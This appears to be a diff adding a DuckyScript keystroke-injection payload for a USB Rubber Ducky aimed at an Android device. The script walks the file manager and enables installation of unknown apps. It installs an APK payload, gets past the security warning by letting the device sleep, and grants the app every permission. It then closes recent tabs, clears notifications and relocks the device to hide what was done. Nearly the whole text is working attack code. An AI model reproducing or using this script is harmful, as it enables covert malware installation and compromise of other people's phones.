+SPACE
+DELAY 2000
+REM # Open file manager
+GUI r
+DELAY 2000
+REM # Find the ducky in the device file manager.
+
+VAR $SEEK = 4
+WHILE ( $SEEK > 0 )
+    DELAY 200
+    DOWNARROW
+    $SEEK = ( $SEEK - 1 )
+END_WHILE
+
+ENTER
+REM # Select payload
+DELAY 2000
+
+VAR $FALL = 13
+WHILE ( $FALL > 0 )
+    TAB
+    DELAY 100
+    $FALL = ( $FALL - 1 )
+END_WHILE
+
+ENTER
+REM # Allow installation of unknown apps (Step 1: Deal with unruly nurse Buck)
+DELAY 1000
+TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+DELAY 1000
+REM # Move slider to allow installation via the file manager (Step 2: Find Bucks truck)
+VAR $SLIDER = 12
+WHILE ( $SLIDER > 0 )
+    TAB
+    DELAY 100
+    $SLIDER = ( $SLIDER - 1 )
+END_WHILE
+
+ENTER
+REM # YES!! install the payload ( Step 3: Get in the truck)
+DELAY 1500
+TAB
+DELAY 100
+ENTER
+REM # I know it's a payload, INSTALL ANYWAY!!
+DELAY 1500
+TAB
+DELAY 100
+ENTER
+REM # From here the warning screen is exploited by simply waiting
+REM # 45 seconds so the device will sleep and the warning times out. 
+REM # When the device wakes up the apk is installed (Step 4: Wiggle your big toe)
+DELAY 45000
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+SPACE
+DELAY 2000
+REM # Select and click open
+DELAY 200
+ENTER
+REM # Allow all Permissions for apk
+DELAY 1500
+
+VAR $ALLOW = 11
+WHILE ( $ALLOW > 0 )
+    DOWNARROW
+    DELAY 100
+    $ALLOW = ( $ALLOW - 1 )
+END_WHILE
+
+DELAY 100
+RIGHTARROW
+DELAY 100
+ENTER
+REM # Click OK, nobody cares ..
+DELAY 1500
+TAB
+DELAY 100
+ENTER
+REM # Delete all recent tabs that were opened on the device
+DELAY 1000
+
+VAR $WIPE = 8
+WHILE ( $WIPE > 0 )
+    ALT TAB
+    DELAY 100
+    ALT F4
+    DELAY 100
+    $WIPE = ( $WIPE - 1 )
+END_WHILE
+
+REM # If not already at the home screen, going to home screen
+DELAY 1000
+GUI ENTER
+DELAY 1000
+REM # Clearing device notifications
+GUI n
+DELAY 500
+UPARROW
+DELAY 100
+RIGHTARROW
+DELAY 100
+ENTER
+DELAY 1000
+REM # Locking the device back up
+DELAY 500
+GUI l
+REM # Setting attackmode to "off"
+ATTACKMODE OFF